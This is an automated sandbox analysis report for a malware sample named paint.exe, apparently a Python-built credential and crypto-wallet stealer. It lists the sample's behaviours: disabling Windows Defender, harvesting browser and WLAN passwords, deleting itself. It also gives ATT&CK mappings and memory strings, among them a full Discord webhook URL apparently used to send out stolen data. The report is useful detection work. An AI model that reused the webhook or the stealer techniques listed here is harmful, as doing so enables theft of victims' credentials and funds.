              Source: C:\Users\user\Desktop\paint.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldbJump to behavior
              Source: C:\Users\user\Desktop\paint.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Users\user\Desktop\paint.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: Yara matchFile source: Process Memory Space: paint.exe PID: 2132, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Source: Yara matchFile source: 00000000.00000003.1673300933.0000023393145000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000003.2003846185.000002077225D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000002.2008785776.0000020771690000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.1673300933.0000023393147000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000002.2008427127.0000020771390000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: paint.exe PID: 6716, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: paint.exe PID: 2132, type: MEMORYSTR
              Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\_MEI67162\rarreg.key, type: DROPPED
              Source: Yara matchFile source: Process Memory Space: paint.exe PID: 2132, type: MEMORYSTR
              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts241
              Windows Management Instrumentation
              1
              DLL Side-Loading
              1
              DLL Side-Loading
              1
              File and Directory Permissions Modification
              1
              OS Credential Dumping
              2
              System Time Discovery
              Remote Services1
              Archive Collected Data
              3
              Ingress Tool Transfer
              Exfiltration Over Other Network Medium1
              Data Encrypted for Impact
              CredentialsDomainsDefault Accounts2
              Native API
              2
              Registry Run Keys / Startup Folder
              1
              Access Token Manipulation
              4
              Disable or Modify Tools
              LSASS Memory3
              File and Directory Discovery
              Remote Desktop Protocol3
              Data from Local System
              21
              Encrypted Channel
              Exfiltration Over Bluetooth1
              System Shutdown/Reboot
              Email AddressesDNS ServerDomain Accounts222
              Command and Scripting Interpreter
              Logon Script (Windows)11
              Process Injection
              11
              Deobfuscate/Decode Files or Information
              Security Account Manager49
              System Information Discovery
              SMB/Windows Admin Shares1
              Email Collection
              4
              Non-Application Layer Protocol
              Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal Accounts3
              PowerShell
              Login Hook2
              Registry Run Keys / Startup Folder
              21
              Obfuscated Files or Information
              NTDS151
              Security Software Discovery
              Distributed Component Object Model1
              Clipboard Data
              5
              Application Layer Protocol
              Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
              Software Packing
              LSA Secrets2
              Process Discovery
              SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
              Timestomp
              Cached Domain Credentials151
              Virtualization/Sandbox Evasion
              VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
              DLL Side-Loading
              DCSync1
              Application Window Discovery
              Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
              File Deletion
              Proc Filesystem11
              Remote System Discovery
              Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
              Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
              Modify Registry
              /etc/passwd and /etc/shadow11
              System Network Configuration Discovery
              Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
              IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron151
              Virtualization/Sandbox Evasion
              Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
              Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd1
              Access Token Manipulation
              Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
              Gather Victim Org InformationDNS ServerCompromise Software Supply ChainWindows Command ShellScheduled TaskScheduled Task11
              Process Injection
              KeyloggingProcess DiscoveryTaint Shared ContentScreen CaptureDNSExfiltration Over Physical MediumResource Hijacking
              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1584382 Sample: paint.exe Startdate: 05/01/2025 Architecture: WINDOWS Score: 100 67 ip-api.com 2->67 69 discord.com 2->69 83 Found malware configuration 2->83 85 Sigma detected: Capture Wi-Fi password 2->85 87 Multi AV Scanner detection for submitted file 2->87 89 11 other signatures 2->89 11 paint.exe 61 2->11         started        signatures3 process4 file5 55 C:\Users\user\AppData\Local\Temp\...\rar.exe, PE32+ 11->55 dropped 57 C:\Users\user\AppData\Local\...\rarreg.key, ASCII 11->57 dropped 59 C:\Users\user\AppData\...\unicodedata.pyd, PE32+ 11->59 dropped 61 55 other files (none is malicious) 11->61 dropped 111 Self deletion via cmd or bat file 11->111 113 Modifies Windows Defender protection settings 11->113 115 Adds a directory exclusion to Windows Defender 11->115 117 3 other signatures 11->117 15 paint.exe 89 11->15         started        signatures6 process7 dnsIp8 71 ip-api.com 208.95.112.1, 49738, 80 TUT-ASUS United States 15->71 73 discord.com 162.159.137.232, 443, 49739 CLOUDFLARENETUS United States 15->73 75 Found many strings related to Crypto-Wallets (likely being stolen) 15->75 77 Self deletion via cmd or bat file 15->77 79 Tries to harvest and steal browser information (history, passwords, etc) 15->79 81 7 other signatures 15->81 19 cmd.exe 1 15->19         started        22 cmd.exe 1 15->22         started        24 cmd.exe 1 15->24         started        26 31 other processes 15->26 signatures9 process10 signatures11 91 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 19->91 93 Suspicious powershell command line found 19->93 95 Uses ping.exe to sleep 19->95 109 5 other signatures 19->109 28 powershell.exe 19->28         started        31 conhost.exe 19->31         started        97 Modifies Windows Defender protection settings 22->97 99 Removes signatures from Windows Defender 22->99 33 powershell.exe 23 22->33         started        43 2 other processes 22->43 101 Adds a directory exclusion to Windows Defender 24->101 35 powershell.exe 24->35         started        37 conhost.exe 24->37         started        103 Uses cmd line tools excessively to alter registry or file data 26->103 105 Encrypted powershell cmdline option found 26->105 107 Tries to harvest and steal WLAN passwords 26->107 39 getmac.exe 26->39         started        41 systeminfo.exe 26->41         started        45 60 other processes 26->45 process12 file13 119 Loading BitLocker PowerShell Module 33->119 121 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 39->121 123 Writes or reads registry keys via WMI 39->123 63 C:\Users\user\AppData\...\u3oq5ojt.cmdline, Unicode 45->63 dropped 65 C:\Users\user\AppData\Local\Temp\S7zJV.zip, RAR 45->65 dropped 48 csc.exe 45->48         started        signatures14 process15 file16 53 C:\Users\user\AppData\Local\...\u3oq5ojt.dll, PE32 48->53 dropped 51 cvtres.exe 48->51         started        process17

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              SourceDetectionScannerLabelLink
              paint.exe43%VirustotalBrowse
              paint.exe37%ReversingLabsWin64.Trojan.Lazy
              SourceDetectionScannerLabelLink
              C:\Users\user\AppData\Local\Temp\_MEI67162\VCRUNTIME140.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI67162\_bz2.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI67162\_ctypes.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI67162\_decimal.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI67162\_hashlib.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI67162\_lzma.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI67162\_queue.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI67162\_socket.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI67162\_sqlite3.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI67162\_ssl.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI67162\api-ms-win-core-console-l1-1-0.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI67162\api-ms-win-core-datetime-l1-1-0.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI67162\api-ms-win-core-debug-l1-1-0.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI67162\api-ms-win-core-errorhandling-l1-1-0.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI67162\api-ms-win-core-file-l1-1-0.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI67162\api-ms-win-core-file-l1-2-0.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI67162\api-ms-win-core-file-l2-1-0.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI67162\api-ms-win-core-handle-l1-1-0.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI67162\api-ms-win-core-heap-l1-1-0.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI67162\api-ms-win-core-interlocked-l1-1-0.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI67162\api-ms-win-core-libraryloader-l1-1-0.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI67162\api-ms-win-core-localization-l1-2-0.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI67162\api-ms-win-core-memory-l1-1-0.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI67162\api-ms-win-core-namedpipe-l1-1-0.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI67162\api-ms-win-core-processenvironment-l1-1-0.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI67162\api-ms-win-core-processthreads-l1-1-0.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI67162\api-ms-win-core-processthreads-l1-1-1.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI67162\api-ms-win-core-profile-l1-1-0.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI67162\api-ms-win-core-rtlsupport-l1-1-0.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI67162\api-ms-win-core-string-l1-1-0.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI67162\api-ms-win-core-synch-l1-1-0.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI67162\api-ms-win-core-synch-l1-2-0.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI67162\api-ms-win-core-sysinfo-l1-1-0.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI67162\api-ms-win-core-timezone-l1-1-0.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI67162\api-ms-win-core-util-l1-1-0.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI67162\api-ms-win-crt-conio-l1-1-0.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI67162\api-ms-win-crt-convert-l1-1-0.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI67162\api-ms-win-crt-environment-l1-1-0.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI67162\api-ms-win-crt-filesystem-l1-1-0.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI67162\api-ms-win-crt-heap-l1-1-0.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI67162\api-ms-win-crt-locale-l1-1-0.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI67162\api-ms-win-crt-math-l1-1-0.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI67162\api-ms-win-crt-process-l1-1-0.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI67162\api-ms-win-crt-runtime-l1-1-0.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI67162\api-ms-win-crt-stdio-l1-1-0.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI67162\api-ms-win-crt-string-l1-1-0.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI67162\api-ms-win-crt-time-l1-1-0.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI67162\api-ms-win-crt-utility-l1-1-0.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI67162\libcrypto-3.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI67162\libffi-8.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI67162\libssl-3.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI67162\python312.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exe0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI67162\select.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI67162\sqlite3.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI67162\ucrtbase.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI67162\unicodedata.pyd0%ReversingLabs
              No Antivirus matches
              No Antivirus matches
              SourceDetectionScannerLabelLink
              https://g..b.com/h0%Avira URL Cloudsafe
              https://g..b.com/x0%Avira URL Cloudsafe
              NameIPActiveMaliciousAntivirus DetectionReputation
              discord.com
              162.159.137.232
              truefalse
                high
                ip-api.com
                208.95.112.1
                truefalse
                  high
                  NameMaliciousAntivirus DetectionReputation
                  https://discord.com/api/webhooks/1325366706595561574/vQDeUuP3YNG10jqpqcayt14YabeOslGKlq6YRX-VMaSv1X0716_bmr9KcFyMQ8vNYrimfalse
                    high
                    NameSourceMaliciousAntivirus DetectionReputation
                    https://duckduckgo.com/chrome_newtabpaint.exe, 00000001.00000003.1916705724.0000020771B88000.00000004.00000020.00020000.00000000.sdmpfalse
                      high
                      https://github.com/Blank-c/BlankOBFpaint.exe, 00000001.00000003.1690340037.00000207714A0000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1690028343.0000020772398000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1690255723.0000020771843000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1690672181.00000207714A0000.00000004.00000020.00020000.00000000.sdmpfalse
                        high
                        https://www.avito.ru/paint.exe, 00000001.00000002.2011815556.000002077262C000.00000004.00001000.00020000.00000000.sdmpfalse
                          high
                          https://duckduckgo.com/ac/?q=paint.exe, 00000001.00000003.1916705724.0000020771B88000.00000004.00000020.00020000.00000000.sdmpfalse
                            high
                            https://api.telegram.org/botpaint.exe, 00000001.00000002.2008785776.0000020771690000.00000004.00001000.00020000.00000000.sdmpfalse
                              high
                              https://www.ctrip.com/paint.exe, 00000001.00000002.2012300197.0000020772C20000.00000004.00001000.00020000.00000000.sdmpfalse
                                high
                                https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#paint.exe, 00000001.00000002.2007443684.000002076F58A000.00000004.00000020.00020000.00000000.sdmpfalse
                                  high
                                  https://www.leboncoin.fr/paint.exe, 00000001.00000002.2012300197.0000020772C20000.00000004.00001000.00020000.00000000.sdmpfalse
                                    high
                                    https://discord.com/api/webhooks/1325366706595561574/vQDeUuP3YNG10jqpqcayt14YabeOslGKlq6YRX-VMaSv1X0paint.exe, 00000001.00000002.2011696050.00000207724C0000.00000004.00001000.00020000.00000000.sdmpfalse
                                      high
                                      https://tools.ietf.org/html/rfc2388#section-4.4paint.exe, 00000001.00000003.2006772338.000002077185F000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1696827300.00000207718C2000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1785051824.000002077185F000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1920856863.0000020771864000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000002.2008958155.00000207718A3000.00000004.00000020.00020000.00000000.sdmpfalse
                                        high
                                        https://docs.python.org/3.11/library/binascii.html#binascii.a2b_base64paint.exe, 00000001.00000002.2008427127.0000020771390000.00000004.00000020.00020000.00000000.sdmpfalse
                                          high
                                          https://weibo.com/paint.exe, 00000001.00000002.2012300197.0000020772C20000.00000004.00001000.00020000.00000000.sdmpfalse
                                            high
                                            https://api.anonfiles.com/uploadpaint.exe, 00000001.00000002.2008785776.0000020771690000.00000004.00001000.00020000.00000000.sdmpfalse
                                              high
                                              https://www.msn.compaint.exe, 00000001.00000003.1914665932.0000020772072000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000002.2012300197.0000020772CC4000.00000004.00001000.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1913464160.0000020771AD2000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1781575579.0000020771AD4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                high
                                                https://nuget.org/nuget.exepowershell.exe, 0000000C.00000002.1893410367.0000019D90074000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002F.00000002.1886205095.000001B39AC2A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002F.00000002.1886205095.000001B39AD6D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002F.00000002.1831220495.000001B38C51B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  https://discord.com/api/v9/users/paint.exe, 00000001.00000002.2008785776.0000020771690000.00000004.00001000.00020000.00000000.sdmpfalse
                                                    high
                                                    https://github.com/urllib3/urllib3/issues/2192#issuecomment-821832963paint.exe, 00000001.00000002.2011696050.00000207724C0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                      high
                                                      http://cacerts.digipaint.exe, 00000000.00000003.1671769217.000002339314F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        high
                                                        https://peps.python.org/pep-0205/paint.exe, 00000001.00000002.2008689837.0000020771590000.00000004.00001000.00020000.00000000.sdmp, base_library.zip.0.drfalse
                                                          high
                                                          https://www.reddit.com/paint.exe, 00000001.00000002.2012300197.0000020772C20000.00000004.00001000.00020000.00000000.sdmpfalse
                                                            high
                                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 0000000C.00000002.1831665258.0000019D80001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002F.00000002.1831220495.000001B38ABB1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              https://www.amazon.ca/paint.exe, 00000001.00000002.2012300197.0000020772C20000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                high
                                                                https://docs.python.org/3/library/importlib.html#importlib.abc.ExecutionLoader.get_filenamepaint.exe, 00000001.00000002.2007861507.0000020770EF0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://urllib3.readthedocs.io/en/latest/advanced-usage.html#https-proxy-error-http-proxypaint.exe, 00000001.00000002.2011815556.000002077262C000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://g..b.com/hpaint.exe, 00000001.00000003.1782235643.0000020771B9E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    https://github.com/python/cpython/blob/3.9/Lib/importlib/_bootstrap_external.py#L679-L688paint.exe, 00000001.00000002.2007861507.0000020770EF0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://www.ebay.co.uk/paint.exe, 00000001.00000002.2012300197.0000020772C20000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                        high
                                                                        http://pesterbdd.com/images/Pester.pngpowershell.exe, 0000002F.00000002.1831220495.000001B38ADDA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 0000000C.00000002.1831665258.0000019D80228000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://www.ebay.de/paint.exe, 00000001.00000002.2012300197.0000020772C20000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                              high
                                                                              http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 0000002F.00000002.1831220495.000001B38ADDA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.get_codepaint.exe, 00000001.00000002.2007861507.0000020770F6C000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://go.micropowershell.exe, 0000002F.00000002.1831220495.000001B38BA88000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/readerpaint.exe, 00000001.00000002.2007443684.000002076F58A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://www.amazon.com/paint.exe, 00000001.00000002.2012300197.0000020772C20000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        https://github.com/python/cpython/issues/86361.paint.exe, 00000001.00000003.1692710715.0000020771486000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1692909387.0000020771500000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1692909387.00000207714C3000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000002.2008427127.0000020771390000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          https://contoso.com/Iconpowershell.exe, 0000002F.00000002.1831220495.000001B38C51B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=paint.exe, 00000001.00000003.1916705724.0000020771B88000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              https://httpbin.org/paint.exe, 00000001.00000002.2010232784.0000020771C47000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0spaint.exe, 00000000.00000003.1673052282.0000023393142000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  https://docs.python.org/3/library/importlib.html#importlib.abc.Loader.exec_modulepaint.exe, 00000001.00000002.2008331491.0000020771290000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016paint.exe, 00000001.00000002.2012300197.0000020772C20000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      https://docs.python.org/3/library/importlib.html#importlib.abc.MetaPathFinder.invalidate_cachespaint.exe, 00000001.00000002.2008331491.0000020771290000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        https://www.ecosia.org/newtab/paint.exe, 00000001.00000003.1916705724.0000020771B88000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brpaint.exe, 00000001.00000003.1913464160.0000020771AE5000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1789072915.0000020771A14000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1719996655.0000020771A4C000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1735925915.0000020771AC1000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1726814607.0000020771A2A000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1729735944.0000020771AE5000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1726814607.0000020771A14000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1724786299.0000020771AC1000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1729735944.0000020771AC1000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1712589930.0000020771A14000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            https://www.youtube.com/paint.exe, 00000001.00000002.2012300197.0000020772C20000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              https://allegro.pl/paint.exe, 00000001.00000002.2012300197.0000020772C20000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                https://github.com/Pester/Pesterpowershell.exe, 0000002F.00000002.1831220495.000001B38ADDA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  http://hg.python.org/cpython/file/603b4d593758/Lib/socket.py#l535paint.exe, 00000001.00000003.2006772338.000002077185F000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1711530938.0000020771BE8000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1785051824.000002077185F000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1781796667.0000020771BE8000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1920856863.0000020771864000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1696746336.0000020771BE8000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000002.2009946233.0000020771BE8000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1734071594.0000020771BE8000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1725063677.0000020771BE8000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1696827300.0000020771892000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.2004727333.0000020771BE8000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000002.2008958155.00000207718A3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    https://github.com/Unidata/MetPy/blob/a3424de66a44bf3a92b0dcacf4dff82ad7b86712/src/metpy/plots/wx_sypaint.exe, 00000001.00000002.2007443684.000002076F58A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      https://MD8.mozilla.org/1/mpaint.exe, 00000001.00000002.2010663767.000002077207E000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000002.2012300197.0000020772C84000.00000004.00001000.00020000.00000000.sdmp, paint.exe, 00000001.00000003.2004077065.0000020772076000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        https://www.python.org/psf/license/paint.exe, paint.exe, 00000001.00000002.2015768208.00007FFDFB6D4000.00000040.00000001.01000000.00000005.sdmpfalse
                                                                                                                          high
                                                                                                                          https://www.bbc.co.uk/paint.exe, 00000001.00000002.2012300197.0000020772C20000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            https://bugzilla.mopaint.exe, 00000001.00000002.2012300197.0000020772C68000.00000004.00001000.00020000.00000000.sdmp, paint.exe, 00000001.00000002.2012300197.0000020772C20000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                              high
                                                                                                                              https://github.com/python/importlib_metadata/wiki/Development-Methodologypaint.exe, 00000001.00000003.1711530938.0000020771B91000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1725063677.0000020771BA0000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000002.2012011288.0000020772710000.00000004.00001000.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1734071594.0000020771B9E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                high
                                                                                                                                http://tools.ietf.org/html/rfc6125#section-6.4.3paint.exe, 00000001.00000002.2011815556.000002077262C000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                  high
                                                                                                                                  https://support.mozilla.org/products/firefoxgro.allizom.tropaint.exe, 00000001.00000003.1913464160.0000020771AE5000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1729735944.0000020771AE5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    high
                                                                                                                                    http://schemas.xmlsoap.org/wsdl/powershell.exe, 0000000C.00000002.1831665258.0000019D80228000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                      high
                                                                                                                                      https://g..b.com/xpaint.exe, 00000001.00000003.1734071594.0000020771B9E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                      unknown
